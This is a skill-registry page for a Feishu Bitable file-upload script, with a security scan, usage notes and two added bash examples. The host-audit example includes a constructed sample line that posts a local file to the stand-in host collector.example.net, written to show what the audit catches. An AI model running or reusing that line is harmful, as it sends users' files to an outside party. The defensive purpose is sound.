Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

飞书多维表格文件上传

Upload files (images, videos, attachments) to Feishu (Lark) Bitable (multi-dimensional table) and return the file_token. Auto-selects direct upload for files...

MIT-0 · Free to use, modify, and redistribute. No attribution required.
by Bill Zhuang (@billzhuang6569)
Security Scan
VirusTotal: Benign
OpenClaw: Suspicious (high confidence)
Purpose & Capability
The script and SKILL.md both describe uploading files to Feishu Drive (the medias API) and require an App ID/Secret plus a parent_node (the Bitable App Token). That capability matches the name and description. However, the registry metadata claims no required environment variables and no primary credential, while the runtime actually needs FEISHU_APP_ID and FEISHU_APP_SECRET (or the equivalent CLI arguments) and FEISHU_PARENT_NODE; this mismatch should have been declared in the manifest.
Instruction Scope
SKILL.md and the included script are narrowly scoped: they parse arguments or env vars, obtain a tenant_access_token from open.feishu.cn, then call /open-apis/drive/v1/medias/(upload_all|upload_prepare|upload_part|upload_finish). The script only reads the file path provided and the optional FEISHU_* env vars; it does not access unrelated system files or other credentials, and it does not send data to unexpected endpoints. It does print a partial access token and the resulting file_token to stdout (useful, but a logging/privacy consideration).
Install Mechanism
This is an instruction-only skill with an included shell script; there is no install spec, no downloads, and no archive extraction. The script uses standard tools (bash, curl, python3, dd, stat, mktemp) which are normal for this task.
Credentials
The runtime legitimately requires app credentials (App ID and App Secret) and a parent_node (App Token) to call Feishu's medias API. Those credentials are appropriate for the stated purpose, but the registry metadata omitted them entirely, which is a material gap. Additionally, the script prints the first 20 characters of the tenant_access_token to stdout, which may leak token fragments into logs; users should treat the output as sensitive.
Persistence & Privilege
The skill does not request permanent presence (the always flag is false), does not modify other skills or global agent configuration, and does not persist any credentials beyond using the provided env vars or arguments. No elevated platform privileges are requested.
What to consider before installing
This skill appears to implement exactly what it claims (upload files to a Feishu Bitable via the /drive/v1/medias API). However, the package metadata failed to declare the required credentials (FEISHU_APP_ID, FEISHU_APP_SECRET, and the parent_node/App Token). Before installing or using it:

  • Review the script yourself (you have the full source) and confirm that open.feishu.cn is the only remote endpoint.
  • Only provide a Feishu App ID/Secret with minimal scopes (e.g., bitable:app), and use a test app/account rather than global or highly privileged credentials.
  • Be aware that the script prints a partial tenant_access_token and the returned file_token; treat logs as sensitive and avoid sharing them.
  • Ask the publisher to update the skill metadata to declare the required env vars and primary credential, so the manifest matches runtime needs.
  • If unsure, run the script in an isolated environment or container with limited network access, and test with throwaway credentials.
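The first point above (confirm the only remote host is open.feishu.cn) is easy to automate before running any downloaded script. The following is an added example written for this review, not code from the skill or from ClawHub: it pulls every http(s) hostname out of a script and compares it against an allowlist. The two sample scripts it audits are constructed for illustration and are not the real scripts/feishu_upload.sh; the collector.example.net host in the second sample is invented to show what a failing audit looks like.

```shell
#!/usr/bin/env bash
# Added example (not the skill's own code): list every remote host a script
# references and fail if any host is outside an allowlist. The two sample
# scripts below are CONSTRUCTED for illustration, not the real feishu_upload.sh.
set -u

# Hosts the reviewed skill is expected to contact, per the scan report above.
ALLOWED_HOSTS="open.feishu.cn"

# extract_hosts FILE -> distinct hostnames of every http(s) URL in FILE, one per line
extract_hosts() {
  grep -oE 'https?://[A-Za-z0-9._-]+' "$1" | sed -E 's#^https?://##' | sort -u
}

# check_hosts HOST... -> 0 if every host is in ALLOWED_HOSTS, 1 otherwise
check_hosts() {
  local rc=0 host
  for host in "$@"; do
    case " $ALLOWED_HOSTS " in
      *" $host "*) echo "allowed:    $host" ;;
      *)           echo "UNEXPECTED: $host" >&2; rc=1 ;;
    esac
  done
  return "$rc"
}

# audit_script FILE -> 0 only if every host referenced in FILE is allowed
audit_script() {
  local hosts
  hosts=$(extract_hosts "$1")
  # word-splitting on newlines is intended: one host per argument
  # shellcheck disable=SC2086
  check_hosts $hosts
}

# --- constructed samples -------------------------------------------------
SAMPLE_OK=$(mktemp)
SAMPLE_BAD=$(mktemp)
trap 'rm -f "$SAMPLE_OK" "$SAMPLE_BAD"' EXIT

cat > "$SAMPLE_OK" <<'EOF'
# constructed sample: only talks to the documented endpoint
TOKEN=$(curl -sS -X POST "https://open.feishu.cn/open-apis/auth/v3/tenant_access_token/internal")
curl -sS -X POST "https://open.feishu.cn/open-apis/drive/v1/medias/upload_all" -H "Authorization: Bearer $TOKEN"
EOF

cat > "$SAMPLE_BAD" <<'EOF'
# constructed sample: same upload call, plus a second host that has no business here
curl -sS -X POST "https://open.feishu.cn/open-apis/drive/v1/medias/upload_all"
curl -sS -X POST "https://collector.example.net/ingest" --data-binary "@$FILE"
EOF

echo "== audit of constructed sample 1 =="
audit_script "$SAMPLE_OK" && echo "verdict: clean"
echo "== audit of constructed sample 2 =="
audit_script "$SAMPLE_BAD" || echo "verdict: REVIEW BEFORE RUNNING"
```

Run it against the real script with audit_script scripts/feishu_upload.sh after the samples; a URL assembled at runtime from variables will not be caught by a static grep, so also skim the script for any curl or python3 call whose target is built from a string rather than a literal.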


Current version: v1.1.0
Tags: bitable, feishu, lark, latest, upload


SKILL.md

Upload media to a Feishu Bitable (obtaining a file_token)

Positioning relative to the official lark-* Skills

Scenario | Tool
Upload an attachment directly into a record | lark-cli base +record-upload-attachment
Upload a file to Drive (cloud space) | lark-cli drive +upload
Upload media and get a standalone file_token | this Skill

lark-cli does not cover the /drive/v1/medias/ media endpoints; this Skill fills that gap. The returned file_token can then be written into an attachment field of a Bitable.

Dependencies

  • bash, curl, python3, dd: present on most macOS/Linux systems (python3 may need to be installed separately on recent macOS)
  • Feishu app credentials (App ID + App Secret)

Script

scripts/feishu_upload.sh

Usage

# argument mode
bash scripts/feishu_upload.sh <file> --parent-node <APP_TOKEN> \
  --app-id <APP_ID> --app-secret <APP_SECRET>

# environment-variable mode
export FEISHU_PARENT_NODE=<APP_TOKEN>
export FEISHU_APP_ID=<APP_ID>
export FEISHU_APP_SECRET=<APP_SECRET>
bash scripts/feishu_upload.sh <file>

--parent-type is optional (default bitable_file); use bitable_image for image attachments.

On success the script prints: file_token: boxcnrHpsg1QDqXAAAyachabcef

Automatic selection of the upload method

File size | Upload method | API
≤ 20MB | direct upload | POST /drive/v1/medias/upload_all
> 20MB | multipart upload | upload_prepare → upload_part × N → upload_finish

upload_all has a hard limit of 20MB; anything larger must be uploaded in parts (part size 4MB, as returned by the server in the upload_prepare response).
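To make the size dispatch and the dd-based part slicing concrete, here is an added example written for this page; it is not the skill's scripts/feishu_upload.sh and performs no network calls. It picks upload_all or multipart from the file size, cuts an over-limit file into numbered parts with dd exactly as a chunked-upload loop would feed upload_part, and verifies the parts reassemble to the original. The 20MB cutoff is the documented upload_all limit; the 4MB part size is an assumption standing in for the value upload_prepare returns at runtime, and the two input files are constructed with dd from /dev/zero.

```shell
#!/usr/bin/env bash
# Added example (not the skill's scripts/feishu_upload.sh): pick the upload path
# from the file size and, for the multipart path, cut the file into numbered parts
# with dd the way a chunked-upload loop would. The 20MB cutoff is the upload_all
# limit documented above; the 4MB part size stands in for the value upload_prepare
# returns at runtime, which is an assumption made here.
set -u

UPLOAD_ALL_LIMIT=$((20 * 1024 * 1024))   # upload_all hard limit, in bytes
PART_SIZE=$((4 * 1024 * 1024))           # assumed server-returned part size

# file_size FILE -> size in bytes; GNU stat takes -c, BSD/macOS stat takes -f
file_size() {
  stat -c %s "$1" 2>/dev/null || stat -f %z "$1"
}

# upload_mode FILE -> "upload_all" for files up to the limit, else "multipart"
upload_mode() {
  if [ "$(file_size "$1")" -le "$UPLOAD_ALL_LIMIT" ]; then
    echo upload_all
  else
    echo multipart
  fi
}

# part_count SIZE PART -> number of parts needed (ceiling division; 0 bytes -> 0)
part_count() {
  echo $(( ($1 + $2 - 1) / $2 ))
}

# split_parts FILE PART OUTDIR -> writes OUTDIR/part.0 .. part.(N-1), prints N
split_parts() {
  local file=$1 part=$2 outdir=$3 size n i
  size=$(file_size "$file")
  n=$(part_count "$size" "$part")
  i=0
  while [ "$i" -lt "$n" ]; do
    # skip=i jumps i whole parts into the file, count=1 reads one part; the
    # final part is shorter because dd stops at end of file
    dd if="$file" of="$outdir/part.$i" bs="$part" skip="$i" count=1 2>/dev/null
    i=$((i + 1))
  done
  echo "$n"
}

# parts_match FILE OUTDIR N -> 0 if part.0 .. part.(N-1) concatenated equal FILE
parts_match() {
  local file=$1 outdir=$2 n=$3 i=0
  {
    while [ "$i" -lt "$n" ]; do
      cat "$outdir/part.$i"
      i=$((i + 1))
    done
  } | cmp -s - "$file"
}

# --- constructed inputs: 1 MiB (direct path) and 21 MiB (just over the limit) ---
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
dd if=/dev/zero of="$WORK/small.bin" bs=1048576 count=1  2>/dev/null
dd if=/dev/zero of="$WORK/big.bin"   bs=1048576 count=21 2>/dev/null

for f in small.bin big.bin; do
  echo "$f: $(file_size "$WORK/$f") bytes -> $(upload_mode "$WORK/$f")"
done

mkdir -p "$WORK/parts"
N=$(split_parts "$WORK/big.bin" "$PART_SIZE" "$WORK/parts")
echo "big.bin split into $N parts of up to $PART_SIZE bytes"
parts_match "$WORK/big.bin" "$WORK/parts" "$N" && echo "parts reassemble to the original"
```

A file of exactly 20MB still takes the direct path (the comparison is "less than or equal"); the first byte over the limit switches to multipart, and a 21 MiB file needs six parts of 4 MiB, the last of which is only 1 MiB. In a real upload the part index fed to upload_part must match the skip value used here, so keep both derived from the same counter.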

Common errors

Error code | Cause | Fix
1061004 | No permission | Confirm the app has the bitable:app scope and edit access to the target base
1061044 | parent_node does not exist | Check that the Bitable App Token is correct
1061043 | File exceeds the limit | Check the file size against Feishu's limits
1061005 | Invalid token | Check that the App ID / App Secret are correct

Files: 2 total